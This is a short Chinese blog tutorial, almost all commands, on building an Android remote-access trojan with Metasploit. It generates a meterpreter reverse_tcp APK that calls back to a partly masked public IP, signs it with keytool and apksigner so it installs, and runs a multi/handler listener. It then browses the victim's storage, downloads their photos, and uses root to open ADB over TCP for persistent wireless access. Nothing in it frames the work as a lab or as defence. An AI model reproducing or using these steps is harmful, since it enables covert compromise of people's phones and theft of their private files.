安卓渗透基础(Metasploit)

发布于:2025-08-12 ⋅ 阅读:(20) ⋅ 点赞:(0)

生成payload

msfvenom -p android/meterpreter/reverse_tcp LHOST=106.53.xx.xx LPORT=8080 -o C:\my_custom_shell.apk

apksigner 是 Android SDK 中的一个工具,用于给 APK 文件签名,确保应用的完整性和安全性。

进入 File > Settings > Appearance & Behavior > System Settings > Android SDK

cmd

C:\Users\xie__\AppData\Local\Android\Sdk\build-tools

然后输入先生成密钥

keytool -genkey -v -keystore C:\Users\xie__\Desktop\shell.keystore -alias sign -keyalg RSA -keysize 2048 -validity 10000

在进行一个签名

apksigner sign --ks C:\Users\xie__\Desktop\shell.keystore --ks-key-alias sign --out C:\Users\xie__\Desktop\my_custom_shell_signed.apk C:\Users\xie__\Desktop\my_custom_shell.apk

在 Metasploit 中监听手机连接(当目标设备安装并打开你生成的 APK 后),需要使用msfconsole配置监听模块

启动 Metasploit 控制台

msfconsole

加载监听模块

使用multi/handler模块(这是 Metasploit 的通用监听模块):

use exploit/multi/handler

配置 payload 类型

需与生成 APK 时使用的 payload 一致(这里是android/meterpreter/reverse_tcp):

set PAYLOAD android/meterpreter/reverse_tcp

设置连接参数

填写生成 APK 时使用的 IP 和端口(必须完全一致):

set LHOST 106.53.xx.xx  # 替换为你生成APK时的IP
set LPORT 8080          # 替换为你生成APK时的端口

然后run

查看照片

cd /storage/emulated/0

下载照片

download Screenshot_20231026-143828.png

木马具备 root → 纯无线一步到位

meterpreter > shell
shell> su
shell> setprop service.adb.tcp.port 5555
shell> stop adbd
shell> start adbd

1234


网站公告

今日签到

点亮在社区的每一天
去签到